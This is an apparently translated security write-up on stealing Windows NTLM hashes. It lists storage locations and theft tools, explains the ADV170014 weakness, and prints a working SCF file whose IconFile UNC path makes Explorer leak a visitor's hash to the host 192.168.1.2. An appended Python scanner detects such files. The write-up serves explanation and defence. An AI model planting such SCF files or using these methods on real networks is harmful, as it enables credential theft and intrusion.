
Obtaining NTLM hashes

1 Background

1.1 Where NTLM hashes are stored:

1. System Database SAM (Security Account Manager)

2. DIT database

3. Memory Cache

1.2 Ways to obtain NTLM hashes

1. Obtain from SAM

2. Memory acquisition

3. DIT database acquisition

4. WCE, PWDUMP, MIMIKATZ…

1.3 Format of an NTLM hash

aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

LMHash (the first half; not stored by default on Windows Server 2008 R2)

NTHash (the second half)

NetHash (Net-NTLM) - the type mainly obtained by the remote methods below

1.4 Remote acquisition (theft):

1. Responder

2. HTTP + SMB

3. SCF + SMB

4. SQL + SMB

ADV170014 NTLM SSO

In October 2017, on Patch Tuesday, Microsoft released a security advisory (ADV170014) describing a weakness in the NTLM authentication scheme that attackers can use to steal password hashes.

The attacker simply needs to place a malicious SCF file in a publicly accessible Windows folder.

Once the file is in the folder it is triggered automatically, without the user opening it; it causes the target's NTLM password hash to be sent to a server configured by the attacker.

The only precondition is that the target host has a shared folder without password protection, which is very common: in offices, schools, hospitals and most Windows environments, people share music, photos and documents through shared folders.

Attack scenario


Non-genuine Windows systems may not have this setting.


Microsoft introduced SCF (Shell Command File) files in Windows 3.11. An SCF file is a plain text file that instructs Windows Explorer to perform a few basic tasks; the IconFile entry tells Explorer where to load the file's icon from, and Explorer fetches it as soon as the folder is displayed.

[Shell]
Command=2
IconFile=\\192.168.1.2\sharetest.ico
[Taskbar]
Command=ToggleDesktop
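As an added defensive example (not part of the original post): a small Python scanner that parses SCF files in the INI-style format shown above and flags any whose IconFile points at a remote UNC path, since that is exactly the entry that makes Explorer authenticate to a foreign host when the folder is rendered. The two sample files are constructed for the example.

```python
import configparser
import re
from pathlib import Path

# Constructed SCF samples (not from the original post): a benign one whose
# icon comes from a local file, and one whose IconFile is a remote UNC path.
SAMPLES = {
    "desktop.scf": "[Shell]\nCommand=2\nIconFile=C:\\Windows\\explorer.exe,3\n"
                   "[Taskbar]\nCommand=ToggleDesktop\n",
    "photos.scf": "[Shell]\nCommand=2\nIconFile=\\\\192.168.1.2\\share\\test.ico\n"
                  "[Taskbar]\nCommand=ToggleDesktop\n",
}

# A UNC path starts with two backslashes, a host, then a backslash.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def parse_scf(text):
    """Parse an SCF body into {section: {key: value}}; malformed input -> {}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case exactly as written in the file
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    return {s: dict(cp[s]) for s in cp.sections()}


def icon_target(scf):
    """Return the IconFile value from any section (case-insensitive key)."""
    for keys in scf.values():
        for k, v in keys.items():
            if k.lower() == "iconfile":
                return v.strip()
    return None


def is_suspicious(text):
    """True when IconFile resolves to a UNC path: merely browsing the folder
    would make Explorer open an SMB session (and send NTLM) to that host."""
    target = icon_target(parse_scf(text))
    return bool(target and UNC_RE.match(target))


def scan_dir(root):
    """Walk a share and report (path, icon_target) for every suspicious SCF."""
    findings = []
    for p in Path(root).rglob("*.scf"):
        try:
            text = p.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the scan
        if is_suspicious(text):
            findings.append((str(p), icon_target(parse_scf(text))))
    return findings
```

Running scan_dir over a file server's share roots (or a hunt over collected SCF samples) gives a quick inventory of files that would leak Net-NTLM hashes just by being listed; an outbound SMB egress block adds the matching network-side control.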
